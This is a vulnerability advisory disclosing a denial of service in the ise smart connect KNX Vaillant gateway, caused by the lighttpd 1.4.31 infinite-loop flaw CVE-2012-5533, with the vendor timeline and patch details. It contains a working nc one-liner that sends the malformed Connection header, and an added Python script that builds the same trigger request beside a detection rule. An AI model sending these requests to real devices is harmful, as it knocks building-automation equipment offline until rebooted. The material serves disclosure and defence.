CVE-2019-19643 ise smart connect KNX Vaillant 1.2.839 Denial of Service
- CVE: CVE-2019-19643
- Author: psytester
- Title: ise smart connect KNX Vaillant 1.2.839 Denial of Service
- Vulnerability Type: CWE-400 Uncontrolled Resource Consumption
- CVSSv3 Base Score: 7.5
- CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- Publishing Date: 12.08.2020
- Updated: –
- Vendor: ise Individuelle Software und Elektronik GmbH
- Product: ise Smart Connect KNX Vaillant
- Vendor contacted: 26.11.2019
- Vendor confirmation: 05.12.2019 with possible release date mid of 2020
- Vendor patch: 2.0.607 since 10.08.2020
- Vendor Reference: –
- Affected Firmware version: 1.2.839 tested
Product overview on vendor’s website.
This device connects a Vaillant heater to KNX building automation and has a TCP/IP stack for its configuration.
Analysis of the underlying operating system of the ise smart connect KNX Vaillant revealed an embedded Linux built with Buildroot 2012.11.1 and BusyBox v1.27.2 (from 2017), together with other outdated software packages.
Just to name a few:
- Buildroot: 2012.11.1
- BusyBox: v1.27.2 from August 2017
- Linux kernel: 3.2.20 from June 2012
- dropbear: 2012.55
- OpenSSL: 1.0.1c from May 2012
- lighttpd: 1.4.31
- ....
A search for already known CVE entries showed that the lighttpd process is susceptible to CVE-2012-5533, an infinite loop in lighttpd 1.4.31 when a request header contains an empty list element (for example a Connection header with two consecutive commas).
This vulnerability can be exploited by unauthenticated attackers with network access to the web interface; a single malformed request is enough (replace <device-ip> with the address of the device's web interface):
echo -ne "GET / HTTP/1.1\r\nHost: <device-ip>\r\nConnection: TC,,Keep-Alive\r\n\r\n" | nc <device-ip> 80
After that, lighttpd stays permanently at 99% CPU load and the ise smart connect KNX Vaillant no longer responds because its resources are used up, which is a Denial of Service:
PID   PPID  USER  STAT  VSZ   %VSZ  %CPU  COMMAND
321   1     root  R     5548  2%    99%   /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
Simply restarting the lighttpd process does not seem to be enough to clear the overload condition; a reboot of the device is required.
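As an added example (not part of psytester's advisory and not vendor code), the following Python script shows the request shape that trips CVE-2012-5533 and two pre-checks a practitioner can run before touching a production device: a banner check that matches the lighttpd 1.4.31 build named above, and a header check that flags an empty element in the Connection header, the same pattern the echo/nc one-liner sends. The sample requests are constructed here, not captured from a device, and the host name device.local is a placeholder. The header check is also the rule a reverse proxy or IDS in front of an unpatched unit would apply to drop such requests.

```python
import re
from typing import Dict, List, Optional

# Constructed sample requests (placeholders, not traffic captured from a device).
BENIGN_REQUEST = b"GET / HTTP/1.1\r\nHost: device.local\r\nConnection: Keep-Alive\r\n\r\n"
TRIGGER_REQUEST = b"GET / HTTP/1.1\r\nHost: device.local\r\nConnection: TC,,Keep-Alive\r\n\r\n"


def parse_headers(raw: bytes) -> Dict[str, List[str]]:
    """Parse the header block of a raw HTTP/1.1 request into {lower-name: [values]}."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:  # lines[0] is the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def connection_tokens(raw: bytes) -> List[str]:
    """Split every Connection header value on commas, keeping empty elements."""
    tokens: List[str] = []
    for value in parse_headers(raw).get("connection", []):
        tokens.extend(t.strip() for t in value.split(","))
    return tokens


def has_empty_connection_token(raw: bytes) -> bool:
    """True when the Connection header carries an empty list element (e.g. "TC,,Keep-Alive").

    That is the request shape CVE-2012-5533 is triggered by; a proxy or IDS in front of
    an unpatched device can reject requests that match this check.
    """
    return "" in connection_tokens(raw)


def lighttpd_version(server_header: Optional[str]) -> Optional[tuple]:
    """Extract (major, minor, patch) from a Server header such as "lighttpd/1.4.31"."""
    if not server_header:
        return None
    m = re.match(r"lighttpd/(\d+)\.(\d+)\.(\d+)", server_header.strip(), re.IGNORECASE)
    return tuple(int(x) for x in m.groups()) if m else None


def banner_matches_affected_version(server_header: Optional[str]) -> bool:
    """Non-destructive pre-check: does the Server banner show the 1.4.31 build named in the advisory?"""
    return lighttpd_version(server_header) == (1, 4, 31)


def build_trigger_request(host: str) -> bytes:
    """Build the same request the echo/nc one-liner sends.

    Only send this to a device you own: on an unpatched unit it pins lighttpd at
    99% CPU until the device is rebooted.
    """
    return (
        f"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: TC,,Keep-Alive\r\n\r\n"
    ).encode("ascii")


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("trigger", TRIGGER_REQUEST)):
        print(f"{label}: tokens={connection_tokens(req)} flagged={has_empty_connection_token(req)}")
    print("banner 'lighttpd/1.4.31' affected:", banner_matches_affected_version("lighttpd/1.4.31"))
    print("banner 'nginx/1.12.2' affected:", banner_matches_affected_version("nginx/1.12.2"))
```

The banner check only tells you the device reports the version the advisory names; it does not prove the bug is reachable, and the trigger request is the only definitive test, which is why it is kept as a separate function that nothing in the script sends.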
There might be many more vulnerabilities, as written in my German blog post about outdated embedded Linux BusyBox/Buildroot installations.
lighttpd fix in new ise smart connect KNX Vaillant version 2.0.607
The base software is now partly updated:
- Buildroot: 2018.02
- BusyBox: v1.27.2, still from August 2017
- Linux kernel: 3.2.98 from January 2018
- dropbear: 2017.75
- OpenSSL: 1.0.2n from December 2017
- nginx: 1.12.2 is used instead of lighttpd
cvedetails for scanning and preparing all CVEs, separated by vendor and product.
me, but I simply scanned known CVEs to use them.
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2020 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.